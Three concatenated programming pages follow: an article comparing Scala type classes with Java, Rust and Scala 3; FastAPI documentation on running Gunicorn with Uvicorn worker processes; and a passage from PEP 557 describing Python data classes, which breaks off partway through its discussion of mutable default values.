Scala Type Classes comparison In the first article we discussed how Type Classes are encoded in Scala. In the second article we are going to compare Scala type class implementation with Java, Rust and Scala 3, which is new version of Scala compiler. Before comparing Scala 2 type classes encoding we will discuss some of the drawbacks of this feature. Current Scala Drawbacks Before we look at new version of Scala 3, let us summarize what are the current drawbacks of main Scala version, which is 2.13 as of writing this article. - No language level support. One can encode type classes using traits, implicits and objects. Quick look back: trait Formatter[A] { … }object instances { implicit val … implicit val … implicit def … } object syntax { implicit class FromatterOps[A: Formatter](a: A) { … } } It would be nice to get rid some of ceremonies and get support from the language. 2. Ambiguous instances error That it the main problem as for me. Since we can have non-unique instances defined in our program or in imported libraries, sometimes we have to disambiguate type classes usage in our program, i.e. to tell compiler explicitly which instance we meant. Event if we do not care which instance will be used for some particular type, we have to leave only one in scope for a caller site. One of the example of this problem is described here in this paper: The Limitations of Type Classes as Subtyped Implicits You can see that this problem with implicits related to type classes even led to writing a white paper about it :-) Here is an example of this problem: Functor +----> <----+ | | | | | | Monad Traverse Monad and Traverse type classes can share common base type, which is Functor, i.e. they both need map function. In case we have polymorphic function like this: def myFunc[F[_] : Traverse : Monad] = println(implicitly[Functor[F]].map(…)) in function body we need a Functor instance for type F[_] to map over this type, however later in this function body we need a Traverse and then Monad. So we need both type classes, but at some point we just need a Functor, which we know it is a base type for both. In situation, we will have compile-time error: Error:(12, 23) ambiguous implicit values: both value evidence$2 of type Monad[F] and value evidence$1 of type Traverse[F] match expected type Functor[F] There are some techniques how to disambiguate type classes in this situation. However, they require writing additional code or thinking on how to avoid such code situations where base type classes may clash in their children type classes, when both are in scope. In case you use Cats library or will be using it, then you may find yourself in such situation. Different Cats imports may bring clashing instances, so that you need to be careful with what to import or perhaps choose some strategy either always use cats.implicits import or import exact instances one by one. Implicit disambiguation approach is relatively clear for the code you control or wrote, but it is much harder to understand such problems, if a clash is coming due to conflicting instances from the 3rd party library. 3. Multi-parameter Type Classes Type Classes can have more than one type parameter. When we implement an instance of such type, we need to specify all types. Let’s imagine a trait with addition operation: trait Add[A, B, C] { def +(a: A, b: B): C } Ideally, we need to confirm this operation with mathematical laws. If A or B operand is Double, result must be Double. However, we can define different combination of instances and they will compile. Possible type class instances: implicit val intAdd1: Add[Int, Int, Double] = (a: Int, b: Int) => a + bimplicit val intAdd2: Add[Int, Int, Int] = (a: Int, b: Int) => a + b Notice that first instance returns Double type as a result, which does not makes sense from math perspective, however someone would want such behaviour in some cases. Problem with multi-parameter type classes that we cannot specify dependencies among type parameters easily and disallow some combinations of them. Comparison with Java In case you have Java experience, there is example below showing how Scala type classes could be implemented in Java at certain degree. However, there is a lack of some implicit constructions, which immediately neglects the whole idea of type classes and makes it impossible: public interface Formatter<T> { String fmt(T t); }class instances { static Formatter<String> string = s -> String.format("string: %s", s); static Formatter<Integer> integer = i -> String.format("int: %s", i); }class Api { static <T> String fmt(T t, Formatter<T> ev) { return ev.fmt(t); } }…public static void main(String[] args) { System.out.println(Api.fmt("some string", instances.string)); System.out.println(Api.fmt(4, instances.integer)); } We pass type class instances as static variable of class called “instances”, i.e. we are doing this explicitly, which is quite weird. Comparison with Rust If you are Rust programmer, you will probably find better understanding of Scala type classes, by looking at Rust translation below. If you have no clue how Rust is implementing similar ideas like Haskell Type Classes, then below example might be interesting to see as well. Rust example might be a good motivator for you to finally study what is type classes at all. Some Rust characteristics with regards to type classes: - Rust supports traits, which are a limited form of type classes with coherence - Instances can be also defined conditionally - Does not support higher-kinded types <T<U>> Example: // trait with generic type T pub trait Formatter<T> { fn fmt(&self) -> String; }// type instance for string impl Formatter<Self> for &str { fn fmt(&self) -> String { "[string: ".to_owned() + &self + "]" } }// type instance for integer impl Formatter<Self> for i32 { fn fmt(&self) -> String { "[int_32: ".to_owned() + &self.to_string() + "]" } }// type instance for Vec<T> impl<T: Formatter<T>> Formatter<Self> for Vec<T> { fn fmt(&self) -> String { self.iter().map(|e| e.fmt()).collect::<Vec<_>>().join(" :: ") } }// polymorphic function fn fmt<T>(t: T) -> String where T: Formatter<T> { t.fmt() } Polymorphic function above is really unnecessary in Rust, since postfix notation work out-of-the box for Rust traits when using “self” pointer. Rust in Action We have implemented Formatter trait for string, integer and vector. let x = fmt("Hello, world!”); // or “Hello…”.fmt() let i = 4.fmt(); let ints = vec![1, 2, 3].fmt();println!("{}", x); // [string: Hello, world!] println!("{}", i); // [int_32: 4] println!("{}", ints) // [int_32: 1] :: [int_32: 2] :: [int_32: 3] If we try to use fmt function for some other type, which does not have implementation for Formatter, then it fails in compile time. let floats = fmt(vec![1.0, 2.0, 3.0]);error[E0277]: the trait bound `{float}: Formatter<{float}>` is not satisfied --> src/main.rs:31:18 | 31 | let floats = fmt(vec![1.0, 2.0, 3.0]); | ^^^ the trait `Formatter<{float}>` is not implemented for `{float}` | = help: the following implementations were found: <&str as Formatter<&str>> <i32 as Formatter<i32>> <std::vec::Vec<T> as Formatter<std::vec::Vec<T>>> = note: required because of the requirements on the impl of `Formatter<std::vec::Vec<{float}>>` for `std::vec::Vec<{float}>` note: required by `fmt` --> src/main.rs:23:1 | 23 | fn fmt<T>(t: T) -> String where T: Formatter<T> { | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ As we can see, compiler says there were 3 other implementations found, but none for Formatter<Float>. Future Of Type Classes in Scala In new version of Scala 3, which is also known as Dotty, type classes received proper attention. The “implicit” modifier has been replaced by “given” modifier with some syntax around it. This change should bring some clarity in how to work in Scala with implicit arguments, values, imports, etc. In my opinion, it is good change. It should help new Scala programmers to grasp power of the language faster, instead of searching for different applications of implicit keyword in different contexts of their programs. In the latest release of Scala 3 as of November 2019, we can now encode our Formatter type classes as below: trait Formatter[A] { def (a: A)fmt: String }given Formatter[Float] { def (a: Float) fmt: String = s"$a f" }given Formatter[Boolean] { def (a: Boolean) fmt: String = a.toString.toUpperCase }given [T](given Formatter[T]): Formatter[List[T]] { def (l: List[T]) fmt: String = l.map(e => summon[Formatter[T]].fmt(e)).mkString(" :: ") } Above code mimics our Scala 2 implementation sequence. Type class definition is still defined using traits. Then we have 3 type class instances. The last one is conditional instance for a List of a type T as long Formatter of T is given. New method called summon replaces old method implicitly. Old implicit and implicitly method still work, but will be deprecated in some future versions of Scala 3.x or 4. import formatting.{given, _} import formatting.Formatterobject Main { def main(args: Array[String]): Unit = { println(List[Float](1f, 2f).fmt) println(2f.fmt) println(List[Boolean](true, false).fmt) println(true.fmt) } } // prints: 1.0 f :: 2.0 f 2.0 f TRUE :: FALSE TRUE Imports of those “given” instances is now done explicitly using given keyword in import statements. The problem with ambiguous instances is mitigated by this new feature, i.e. now user needs to explicitly import “given” instances. It is possible to import “given” instances for a type. Probably, so called, type class “coherence” in Scala will be never solved on JVM, due its dynamic class loading nature. Additionally, we do not need to write extension methods manually. You might have noticed new syntax, when we defined single method in the trait. Method name can be written after the arguments, which allows to apply this method in postfix notation. That means we do not need Simulacrum plugin any more. The latest video you can find about Scala 3 and implicits is a keynote of Martin Odersky at Lambda World 2019: Links - See first part of this article here: - Dotty documentation on “Given” instances: - Rust Traits:
https://medium.com/se-notes-by-alexey-novakov/scala-type-classes-comparison-28b76ce1f37a
CC-MAIN-2019-51
refinedweb
1,680
54.22
Server Workers - Gunicorn with Uvicorn¶ Warning The current page still doesn't have a translation for this language. But you can help translating it: Contributing. Let's check back those deployment concepts from before: - Security - HTTPS - Running on startup - Restarts - Replication (the number of processes running) - Memory - Previous steps before starting Up to this point, with all the tutorials in the docs, you have probably been running a server program like Uvicorn, running a single process. When deploying applications you will probably want to have some replication of processes to take advantage of multiple cores and to be able to handle more requests. As you saw in the previous chapter about Deployment Concepts, there are multiple strategies you can use. Here I'll show you how to use Gunicorn with Uvicorn worker processes. Info If you are using containers, for example with Docker or Kubernetes, I'll tell you more about that in the next chapter: FastAPI in Containers - Docker. In particular, when running on Kubernetes you will probably not want to use Gunicorn and instead run a single Uvicorn process per container, but I'll tell you about it later in that chapter. Gunicorn with Uvicorn Workers¶ Gunicorn is mainly an application server using the WSGI standard. That means that Gunicorn can serve applications like Flask and Django. Gunicorn by itself is not compatible with FastAPI, as FastAPI uses the newest ASGI standard. But Gunicorn supports working as a process manager and allowing users to tell it which specific worker process class to use. Then Gunicorn would start one or more worker processes using that class. And Uvicorn has a Gunicorn-compatible worker class. Using that combination, Gunicorn would act as a process manager, listening on the port and the IP. And it would transmit the communication to the worker processes running the Uvicorn class. And then the Gunicorn-compatible Uvicorn worker class would be in charge of converting the data sent by Gunicorn to the ASGI standard for FastAPI to use it. Install Gunicorn and Uvicorn¶ $ pip install "uvicorn[standard]" gunicorn ---> 100% That will install both Uvicorn with the standard extra packages (to get high performance) and Gunicorn. Run Gunicorn with Uvicorn Workers¶ Then you can run Gunicorn with: $ gunicorn main:app --workers 4 --worker-class uvicorn.workers.UvicornWorker --bind 0.0.0.0:80 [19499] [INFO] Starting gunicorn 20.1.0 [19499] [INFO] Listening at: (19499) [19499] [INFO] Using worker: uvicorn.workers.UvicornWorker [19511] [INFO] Booting worker with pid: 19511 [19513] [INFO] Booting worker with pid: 19513 [19514] [INFO] Booting worker with pid: 19514 [19515] [INFO] Booting worker with pid: 19515 [19511] [INFO] Started server process [19511] [19511] [INFO] Waiting for application startup. [19511] [INFO] Application startup complete. [19513] [INFO] Started server process [19513] [19513] [INFO] Waiting for application startup. [19513] [INFO] Application startup complete. [19514] [INFO] Started server process [19514] [19514] [INFO] Waiting for application startup. [19514] [INFO] Application startup complete. [19515] [INFO] Started server process [19515] [19515] [INFO] Waiting for application startup. [19515] [INFO] Application startup complete. Let's see what each of those options mean: main:app: This is the same syntax used by Uvicorn, mainmeans the Python module named " main", so, a file main.py. And appis the name of the variable that is the FastAPI application. You can imagine that main:appis equivalent to a Python importstatement like: from main import app So, the colon in main:appwould be equivalent to the Python importpart in from main import app. --workers: The number of worker processes to use, each will run a Uvicorn worker, in this case, 4 workers. --worker-class: The Gunicorn-compatible worker class to use in the worker processes. Here we pass the class that Gunicorn can import and use with: import uvicorn.workers.UvicornWorker --bind: This tells Gunicorn the IP and the port to listen to, using a colon ( :) to separate the IP and the port. - If you were running Uvicorn directly, instead of --bind 0.0.0.0:80(the Gunicorn option) you would use --host 0.0.0.0and --port 80. In the output, you can see that it shows the PID (process ID) of each process (it's just a number). You can see that: - The Gunicorn process manager starts with PID 19499(in your case it will be a different number). - Then it starts Listening at:. - Then it detects that it has to use the worker class at uvicorn.workers.UvicornWorker. - And then it starts 4 workers, each with its own PID: 19511, 19513, 19514, and 19515. Gunicorn would also take care of managing dead processes and restarting new ones if needed to keep the number of workers. So that helps in part with the restart concept from the list above. Nevertheless, you would probably also want to have something outside making sure to restart Gunicorn if necessary, and also to run it on startup, etc. Uvicorn with Workers¶ Uvicorn also has an option to start and run several worker processes. Nevertheless, as of now, Uvicorn's capabilities for handling worker processes are more limited than Gunicorn's. So, if you want to have a process manager at this level (at the Python level), then it might be better to try with Gunicorn as the process manager. In any case, you would run it like this: $ uvicorn main:app --host 0.0.0.0 --port 8080 --workers 4 <font color="#A6E22E">INFO</font>: Uvicorn running on <b></b> (Press CTRL+C to quit) <font color="#A6E22E">INFO</font>: Started parent process [<font color="#A1EFE4"><b>27365</b></font>] <font color="#A6E22E">INFO</font>: Started server process [<font color="#A1EFE4">27368</font>] <font color="#A6E22E">INFO</font>: Waiting for application startup. <font color="#A6E22E">INFO</font>: Application startup complete. <font color="#A6E22E">INFO</font>: Started server process [<font color="#A1EFE4">27369</font>] <font color="#A6E22E">INFO</font>: Waiting for application startup. <font color="#A6E22E">INFO</font>: Application startup complete. <font color="#A6E22E">INFO</font>: Started server process [<font color="#A1EFE4">27370</font>] <font color="#A6E22E">INFO</font>: Waiting for application startup. <font color="#A6E22E">INFO</font>: Application startup complete. <font color="#A6E22E">INFO</font>: Started server process [<font color="#A1EFE4">27367</font>] <font color="#A6E22E">INFO</font>: Waiting for application startup. <font color="#A6E22E">INFO</font>: Application startup complete. The only new option here is --workers telling Uvicorn to start 4 worker processes. You can also see that it shows the PID of each process, 27365 for the parent process (this is the process manager) and one for each worker process: 27368, 27369, 27370, and 27367. Deployment Concepts¶ Here you saw how to use Gunicorn (or Uvicorn) managing Uvicorn worker processes to parallelize the execution of the application, take advantage of multiple cores in the CPU, and be able to serve more requests. From the list of deployment concepts from above, using workers would mainly help with the replication part, and a little bit with the restarts, but you still need to take care of the others: - Security - HTTPS - Running on startup - Restarts - Replication (the number of processes running) - Memory - Previous steps before starting Containers and Docker¶ In the next chapter about FastAPI in Containers - Docker I'll tell some strategies you could use to handle the other deployment concepts. I'll also show you the official Docker image that includes Gunicorn with Uvicorn workers and some default configurations that can be useful for simple cases. There I'll also show you how to build your own image from scratch to run a single Uvicorn process (without Gunicorn). It is a simple process and is probably what you would want to do when using a distributed container management system like Kubernetes. Recap¶ You can use Gunicorn (or also Uvicorn) as a process manager with Uvicorn workers to take advantage of multi-core CPUs, to run multiple processes in parallel. You could use these tools and ideas if you are setting up your own deployment system while taking care of the other deployment concepts yourself. Check out the next chapter to learn about FastAPI with containers (e.g. Docker and Kubernetes). You will see that those tools have simple ways to solve the other deployment concepts as well. ✨
https://fastapi.tiangolo.com/sv/deployment/server-workers/
CC-MAIN-2022-40
refinedweb
1,361
53.92
I).]]> I like to write blog postings in reStructuredText, and I use rst2html from Python's docutils to turn them into HTML before pasting into my blog software. One thing missing is source highlighting for Haskell, Python etc. Thankfully, Both reST and Python's docutils are written to be extensible. Below is a replacement 'rst2html' which includes support for Haskell colouring using HsColour, and just about everything else using Pygments. Example usage: .. code-block:: python import os # Standard hello world stuff class Hello() def do_it(self) print "Hello world" if __name__ == '__main__': Hello().do_it() def main() print "Hello world" Output: import os # Standard hello world stuff class Hello() def do_it(self) print "Hello world" if __name__ == '__main__': Hello().do_it() Some sample Haskell: class Show a where show :: a -> String showsPrec :: Int -> a -> ShowS showList :: [a] -> ShowS -- Minimal complete definition: show or showsPrec show x = showsPrec 0 x "" showsPrec _ x s = show x ++ s showList [] = showString "[]" showList (x:xs) = showChar '[' . shows x . showl xs where showl [] = showChar ']' showl (x:xs) = showChar ',' . shows x . showl xs class Eq a where (==), (/=) :: a -> a -> Bool -- Minimal complete definition: (==) or (/=) x == y = not (x/=y) x /= y = not (x==y) Here is the code: #!/usr/bin/python """ rst2html A minimal front end to the Docutils Publisher, producing HTML, with an extension for colouring code-blocks """ try: import locale locale.setlocale(locale.LC_ALL, '') except: pass from docutils import nodes, parsers from docutils.parsers.rst import states, directives from docutils.core import publish_cmdline, default_description import tempfile, os def getCommandOutput2(command): child_stdin, child_stdout = os.popen2(command) child_stdin.close() data = child_stdout.read() err = child_stdout.close() if err: raise RuntimeError, '%s failed w/ exit code %d' % (command, err) return data def highlight_haskell(text): fh, path = tempfile.mkstemp() os.write(fh, text) output = getCommandOutput2(["HsColour", "-css", "-partial", path]) os.close(fh) return output def get_highlighter(language): if language == 'haskell': return highlight_haskell from pygments import lexers, util, highlight, formatters import StringIO try: lexer = lexers.get_lexer_by_name(language) except util.ClassNotFound: return None formatter = formatters.get_formatter_by_name('html') def _highlighter(code): outfile = StringIO.StringIO() highlight(code, lexer, formatter, outfile) return outfile.getvalue() return _highlighter # Docutils directives: def code_block(name, arguments, options, content, lineno, content_offset, block_text, state, state_machine): """ The code-block directive provides syntax highlighting for blocks of code. It is used with the the following syntax:: .. code-block:: python import sys def main(): sys.stdout.write("Hello world") Currently support languages: python (requires pygments), haskell (requires HsColour), anything else supported by pygments """ language = arguments[0] highlighter = get_highlighter(language) if highlighter is None: error = state_machine.reporter.error( 'The "%s" directive does not support language "%s".' % (name, language), nodes.literal_block(block_text, block_text), line=lineno) if not content: error = state_machine.reporter.error( 'The "%s" block is empty; content required.' % (name), nodes.literal_block(block_text, block_text), line=lineno) return [error] include_text = highlighter("\n".join(content)) html = '<div class="codeblock %s">\n%s\n</div>\n' % (language, include_text) raw = nodes.raw('',html, format='html') return [raw] code_block.arguments = (1,0,0) code_block.options = {'language' : parsers.rst.directives.unchanged } code_block.content = 1 # Register directives.register_directive( 'code-block', code_block ) description = ('Generates (X)HTML documents from standalone reStructuredText ' 'sources. ' + default_description) # Command line publish_cmdline(writer_name='html', description=description) I borrowed some things from this recipe, thanks. I also discovered Using Pygments in ReST documents after I wrote this.]]> I.]]> I. :-).]]> Part!]]> Having.]]> I've just finished the bulk of some web site development work for a Christian organisation, so I've finally found time to carry on my series on criticisms of blogging. In my previous post, I wondered whether the Christian blogosphere is really going to be an effective way to change Christian's minds about things. In this one, I'm developing those thoughts, and looking a bit more outward. Blogging is often touted as an effective evangelistic tool. As I see it, the sad truth is that the Christian sector of the blogosphere has a fairly mixed witness to the rest of the world. Take Phillip Johnson's opening post, for instance. I do not mean to criticise the post at all, as I in fact agree with most of it and intend to pick up on some of the things he says in a later post. What interests me most, however, is the discussion in the comments afterwards. While parts of it are fine, it gets pretty ugly in places--one party mis-judges, another retaliates, and name-calling abounds. This is by no means the only place I've seen things like this -- the discussion after Tim Challies review of The Purpose Driven Life ends with Tim closing the discussion with the words If we are Christians, let us not behave as unbelievers., and those words could do some heeding in many boards and blogs I've seen. There are a few things to say about these 'debates'. First, often those who get worked up aren't the major players, but then again, an outsider probably wouldn't notice who was who, and probably everyone who participates is at least naming the name of Christ. Second, in some ways it is good that people feel strongly about these things -- if we don't get worked up about theology, there is something wrong with our theology, or our piety. Third, I think there is a large degree of mis-understanding about the nature of the discussion, so people quickly take offence when none was intended. For example, in the afore-mentioned book review at Challies, one commenter took offence and described the post as an attack on what he obviously considered to be a work of God and a man of God, despite the fact the review was far from inflamatory in style. But these aren't just unfortunate accidents. The medium itself seems to bring out all these things in people. I doubt that few people who have used the internet for long will have failed to notice how a completely innocent comment on a in an e-mail can come across as sarcastic, grumpy, beligerent or worse, even to people you know. Add to this the fact that you are complete strangers to most of the people you 'meet' on the internet, even those you think you know well, and so will not have to deal with any fallout from a harsh comment, and then add the strong feelings I mentioned earlier, and you've got a recipe for disaster. It's become a policy of mine that in any discussions with Christian brothers and sisters, as far as it depends on me, I ought to ensure they understand that I love them before I criticise them. When it comes to criticising their theology rather than them personally, this is even more important, not less, because it concerns what they believe about God, who, you must assume, is more dear to them than life itself. With that rule, I just don't know how to engage in any serious debate through blogging, apart from with people I already know. I should point out that this rule doesn't in any way preclude public debate--I can imagine how to obey it even in public preaching to strangers, or in authoring a book. Nor am I saying that no bloggers achieve it -- many do so admirably. But somehow things still seem to get out of hand in blogs and message boards, and with relatively little positive fruit. So to conclude, I'm inclined to suspect that blogosphere debate of theology is doomed to be a poor witness to any unbelieving onlookers, as well as being very ineffective in changing Christians' minds. I've got a lot more reasons coming, so I suspect I may have convinced myself to quit this sphere before I get through them. I'll try to finish the series anyway, in order to crystallise my thoughts and make a more decisive break.]]> I.]]> I've managed to complete my new blogging software, and I'm rather pleased with myself about it too. The web pages may look fairly similar, but under the hood it's completely brand new. One new feature is a much better categories system - have a look at the side bar - and a proper template engine, which is reflected in the fact that the title of the page changes on the pages for individual items, amongst other things. Also, for those of you using the RSS feed, have a look at my feeds page where you can customise your feed to posts that are of interest to you. The comment forms now also have a 'Preview' button. The lack of filtering by category was one thing that was holding me back a bit - I'm aware that posting about software and computers half the time is going to make this fairly boring to most of the Christians who might read this blog. But now you can filter that out yourself! I was pleased with how quickly I was able to develop this lot, and with the quality of the resulting code -- it took me about 5 evenings, and then about half of today to add basic admin functions. My method is based around the excellent PHP Template Engine I mentioned before. Did I mentioned that it is the best PHP Template Engine there is? It's really great (that's for Google). In total I've got around 1600 lines of code, but that includes the template engine (which is only about 40 lines), admin functions for adding, listing, deleting and editing posts, a very simple but powerful flatfile database class I had to write at the same time, functions for getting cached remote files (used for my blogrolls), the RSS feed, the RSS feed picker, and a trackback server (pinched mainly from WordPress), as well as the front end stuff. I've also implemented a kind of MVC (Model View Controller) system, and I have a complete data access layer (though one which is as simple as it can be - due to PHP data structures my data model is reduced to a list of constants). I've loved how flexible the template engine stuff is too - you can use it for as much or as little of any page as you want. Lots of things came together to make this project first very quick, and secondly something I'm proud of (can you tell?!): First was the template engine, and realising that the goal is separation of presentation and 'business' logic, NOT separation of PHP and HTML (or separation of declarative and imperative code, to put it more generically); Second, keeping in mind lots of the criticisms of OOP I've been reading, especially Object Oriented Programming Oversold and related articles; third, and ironically, being more aware of MVC and other design patterns; fourth, having a better grasp of how to design databases. The resulting code tries to use a variety of paradigms as and when they are useful. It also uses some techniques and ideas I've not seen before, which at first seemed like a bit of a hack, but after reading some more of the stuff about Table Oriented Programming I've now decided are a deliberate move! The code still isn't perfect (or complete - I haven't don't bulk moderation of comments yet, or admin front end for adding categories), and it hasn't totally eliminated in all areas the tedious mapping of database fields to user interface fields, which was something I was aiming for. There are also things I'm still working out and experimenting with, but I've got a pretty good basis for further PHP apps. One nice thing I've implemented is separation of the presentation and control of forms such as the comments form. This will enable me to make it fairly spam proof in the future, which is fast becoming a priority. I'll be writing up separate entries on the range of things I've learnt with this project - it has been frustrating not having the software complete enough to use it for blogging for this past week!]]>
http://lukeplant.me.uk/blog/categories/blogging-and-bloggers/atom/index.xml
CC-MAIN-2015-27
refinedweb
2,011
59.03
[spoiler title=”Lesson Video”] Direct Download of Video (For mobile / offline viewing)(right click > save target as) [/spoiler] [spoiler title=”Lesson Source Code”] #include <iostream> #include <cmath>; cout < < "Enter your starting capital: "; cin >> principal; cout < < "\nEnter your APR (ex: 8.0% = 8): "; cin >> APR; cout < < "\nHow many years will your invest this money for: "; cin >> years; APR /= 100; total = principal * ( pow((1+APR),years) ); cout < < "\nThe amount in your account after: " << years << " years will be: " << total << endl; system("PAUSE"); return 0; } [/spoiler] Homework is described and should be submitted here: Cmath Cmath is a library that is used to perform mathematical functions in C++ programs. You could always create functions of your own to perform the tasks in this library (when you learn functions down the line). For a more complete listing of functions available inside the cmath library click here Raising a number to a power Raising a number to a power is very easy in C++ using the Cmath library. The reference linked above should show you examples. For powers you would use pow(number, powerRaisedTo); as your command.
https://beginnerscpp.com/lesson-3-working-with-libraries-and-calculating-interest/
CC-MAIN-2019-13
refinedweb
181
50.8
A python package for simulating hydrogeological virtual realities Project description HyVR: Turning your geofantasy into reality! The Hydrogeological Virtual Reality simulation package (HyVR) is a Python module that helps researchers and practitioners generate subsurface models with multiple scales of heterogeneity that are based on geological concepts. The simulation outputs can then be used to explore groundwater flow and solute transport behaviour. This is facilitated by HyVR outputs in common flow simulation packages’ input formats. As each site is unique, HyVR has been designed that users can take the code and extend it to suit their particular simulation needs. The original motivation for HyVR was the lack of tools for modelling sedimentary deposits that include bedding structure model outputs (i.e., dip and azimuth). Such bedding parameters were required to approximate full hydraulic-conductivity tensors for groundwater flow modelling. HyVR is able to simulate these bedding parameters and generate spatially distributed parameter fields, including full hydraulic-conductivity tensors. More information about HyVR is available in the online technical documentation. I hope you enjoy using HyVR much more than I enjoyed putting it together! I look forward to seeing what kind of funky fields you created in the course of your work. HyVR can be attributed by citing the following journal article: Bennett, J. P., Haslauer, C. P., Ross, M., & Cirpka, O. A. (2018). An open, object-based framework for generating anisotropy in sedimentary subsurface models. Groundwater. DOI: 10.1111/gwat.12803. A preprint version of the article is available here. Installing the HyVR package Installing Python Windows If you are using Windows, we recommend installing the Anaconda distribution of Python 3. This distribution has the majority of dependencies that HyVR requires. It is also a good idea to install the HyVR package into a virtual environment. Do this by opening a command prompt window and typing the following: conda create --name hyvr_env You need to then activate this environment: conda activate hyvr_env Linux Depending on your preferences you can either use the Anaconda/Miniconda distribution of python, or the version of your package manager. If you choose the former, follow the same steps as for Windows. If you choose the latter, you probably already have Python 3 installed. If not, you can install it using your package manager (e.g. apt on Ubuntu/Debian). In any way we recommend using a virtual environment. Non-conda users can use virtualenvwrapper or pipenv. Installing HyVR Once you have activated your virtual environment, you can install HyVR from PyPI using pip: pip install hyvr The version on PyPI should always be up to date. If it’s not, you can also install HyVR from github: git clone pip install hyvr To install from source you need a C compiler. Installation from conda-forge will (hopefully) be coming soon. Usage To use HyVR you have to create a configuration file with your settings. You can then run HyVR the following way: (hyvr_env) $ python -m hyvr my_configfile.ini HyVR will then run and store all results in a subdirectory. If no configfile is given, it will run a test case instead: (hyvr_env) $ python -m hyvr If you want to use HyVR in a script, you can import it and use the run function: import hyvr hyvr.run('my_configfile.ini') Examples can be found in the testcases directory of the github repository, the general setup and possible options of the config-file are described in the documentation. Currently only made.ini is ported to version 1.0.0. Source The most current version of HyVR will be available at this github repository; a version will also be available on the PyPI index which can be installed using pip. Requirements Python HyVR was developed for use with Python 3.4 or greater. It may be possible to use with earlier versions of Python 3, however this has not been tested. Development HyVR has been developed by Jeremy Bennett (website) as part of his doctoral research at the University of Tübingen and by Samuel Scherrer as a student assistant. You can contact the developer(s) of HyVR by email or via github. Problems, Bugs, Unclear Documentation If you have problems with HyVR have a look at the troubleshooting section. If this doesn’t help, don’t hesitate to contact us via email or at github. If you find that the documentation is unclear, lacking, or wrong, please also contact us. Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/hyvr/
CC-MAIN-2018-51
refinedweb
754
55.44
PEP 557 -- Data Classes Contents - Notice for Reviewers - Abstract - Rationale - Specification - Discussion - Rejected ideas -". Because Data Classes use normal class definition syntax, you are free to use inheritance, metaclasses, docstrings, user-defined methods, class factories, and other Python class features., comparison methods, and optionally other methods as described in the Specification section. Such a class is called a Data Class, but there's really nothing special about the class: the decorator adds generated methods to the class and returns the same class it was given. As an example: @dataclass class InventoryItem: '''Class for keeping track of an item in inventory.''' save you from writing and maintaining these methods. Rationale There have been numerous attempts to define classes which exist primarily to store values which are accessible by attribute lookup. Some examples include: - collection.namedtuple in the standard library. - typing.NamedTuple in the standard library. - The popular attrs [1] project. - George Sakkis' recordType recipe [2], a mutable data type inspired by collections.namedtuple. - Many example online recipes [3], packages [4], and questions [5]. David Beazley used a form of data classes as the motivating example in a PyCon 2013 metaclass talk [6]. So, why is this PEP needed? With the addition of PEP 526, Python has a concise way to specify the type of class members. This PEP leverages that syntax to provide a simple, unobtrusive way to describe Data Classes. With two exceptions,. One main design goal of Data Classes is to support static type checkers. The use of PEP 526 syntax is one example of this, but so is the design of the fields() function and the @dataclass decorator. Due to their very dynamic nature, some of the libraries mentioned above are difficult to use with static type checkers.? - API compatibility with tuples or dicts is required. - Type validation beyond that provided by PEPs 484 and 526 is required, or value validation or conversion is required. Specification All of the functions described in this PEP will live in a module named dataclasses. A function dataclass which is typically used as a class decorator is provided to post-process classes and add generated methods, described below. The dataclass decorator examines the class to find fields. A field is defined as any variable identified in __annotations__. That is, a variable that has a type annotation. With two exceptions will add various "dunder" methods to the class, described below. If any of the added methods already exist on the class, a TypeError will be raised. The decorator returns the same class that is called on: no new class is created. The dataclass decorator is typically used with no parameters and no parentheses. However, it also supports the following logical signature: def dataclass(*, init=True, repr=True, eq=True, order=False, hash=None, frozen=False), hash=None, frozen=False) class C: ... The parameters to dataclass are: init: If true (the default), a __init__ method will be generated.). eq: If true (the default), __eq__ and __ne__ methods will be generated. These compare the class as if it were a tuple of its fields, in order. Both instances in the comparison must be of the identical type. order: If true (the default is False), __lt__, __le__, __gt__, and __ge__ methods will be generated. These compare the class as if it were a tuple of its fields, in order. Both instances in the comparison must be of the identical type. If order is true and eq is false, a ValueError is raised. hash: Either a bool or None. If None (the default), the __hash__ method is generated according to how eq and frozen are set. If eq and frozen are both true, Data Classes will generate a __hash__ method for you. If eq is true and frozen is false, __hash__ will be set to None, marking it unhashable (which it is). If eq is false, __hash__ will be left untouched meaning the __hash__ method of the superclass will be used (if the [7] for more information. frozen: If true (the default is False), assigning to fields will generate an exception. This emulates read-only frozen instances. See the discussion below. fields may optionally specify a default value, using normal Python syntax: @dataclass class C: a: int # 'a' has no default value b: int = 0 # assign a default value for 'b' In this example, both a and b will be included in the added __init__ method, which will be defined as: def __init__(self, a: int, b: int = 0): TypeError will be raised if a field without a default value follows a field with a default value. This is true either when this occurs in a single class, or as a result of class inheritance., compare=True, metadata=None) The _MISSING value is a sentinel object used to detect if the default and default_factory parameters are provided. Users should never use _MISSING or depend on its value. This sentinel is used because None is a valid value for default. is discouraged. One possible reason to set hash=False but compare=True would types.MappingProxyType to make it read-only, and exposed on the Field object. value. If no default will be 10, the class attribute C.t will be 20, and the class attributes C.x and C.y will not be set. Field objects Field objects describe each defined field. These objects are created internally, and are returned by the fields() module-level method (see below). Users should never instantiate a Field object directly. Its documented attributes are: - name: The name of the field. - type: The type of the field. - default, default_factory, init, repr, hash, compare, and metadata have the identical meaning and values as they do in the field() declaration. Other attributes may exist, but they are private and must not be inspected or relied on. post-init processing The generated __init__ code will call a method named __post_init__, if it is defined on the class. It will be called as self.__post_init__(). If not _ One place Data Class mechanisms. For more discussion, see [8]. Such ClassVar pseudo-fields are not returned by the module-level fields() function. Init-only variables Data Classes. For example, suppose a field will be initialzed It is not possible to create truly immutable Python objects. However, by passing frozen=True to the @dataclass decorator you can emulate immutability. In that case, Data Classes will add __setattr__ and __delattr__ methods to the class. These methods will raise a FrozenInstanceError when invoked. There is a tiny performance penalty when using frozen=True: __init__ cannot use simple assignment to initialize fields, and must use object.__setattr__. Inheritance When the Data Class is being created by the @dataclass decorator, it looks through all of the class's base classes in reverse MRO (that is, starting at object) and, for each Data Class If a field specifies a default_factory, it is called with zero arguments when a default value for the field is needed. For example, to create a new instance of a list, use: l: Python stores default member variable values in class attributes. Consider this example, not using Data Classes: class C: x = [] def add(self, element): self.x += element o1 = C() o2 = C() o1.add(1) o2.add(2) assert o1.x == [1, 2] assert o1.x is o2.x Note that the two instances of class C share the same class variable x, as expected. Using Data Classes, that do not specify a value for x when creating a class instance will share the same copy of x. Automatically support mutable default values in the Rejected Ideas section for more details. Using default 